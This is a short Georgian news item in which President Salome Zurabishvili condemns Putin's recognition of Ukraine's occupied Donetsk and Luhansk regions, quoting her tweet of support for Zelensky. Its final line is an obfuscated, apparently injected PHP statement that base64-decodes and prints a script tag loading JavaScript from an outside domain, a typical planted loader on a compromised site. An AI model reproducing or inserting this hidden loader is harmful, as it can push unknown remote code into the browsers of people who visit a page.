celsiusi
ავერსი საქკაბელი
პუტინის მიერ უკრაინის ოკუპირებული ტერიტორიების დამოუკიდებელ სახელმწიფოებად აღიარებას საქართველოს პრეზიდენტი სალომე ზურაბიშვილი ეხმაურება.
 
ზურაბიშვილის თქმით, მკაცრად გმობს ამ გადაწყვეტილებას, რომელიც იმეორებს საქართველოს ტერიტორიების ოკუპაციის სცენარს.
 
„საქართველო მკაცრად გმობს უკრაინის დონეცკისა და ლუჰანსკის რეგიონების „აღიარებას“. ეს არის იმ სცენარის გამეორება, რომელმაც მოიტანა ჩვენი ქვეყნის ტერიტორიის 20%-ის აღიარება. საქართველო თქვენ გვერდით დგას პრეზიდენტო ზელენსკი უკრაინის ტერიტორიული მთლიანობისა და მშვიდობის მხარდასაჭერად“, – წერს ზურაბიშვილი Twitter-ზე.
 
ცოტა ხნის წინ რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა გადაწყვიტა, რომ უკრაინის ოკუპირებული რეგიონები დამოუკიდებელ სახელმწიფოებად აღიაროს. ამასთან ერთად, მისი თქმით, გაფორმდება რუსეთსა და ახალ რესპუბლიკებს შორის ურთიერთდახმარების ხელშეკრულება, უკრაინას კი მოუწოდა, შეწყვიტოს „სისხლისღვრა“ დონბასში. ამის შესახებ მან რუსი ხალხისადმი სპეციალური მიმართვისას განაცხადა.
685
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");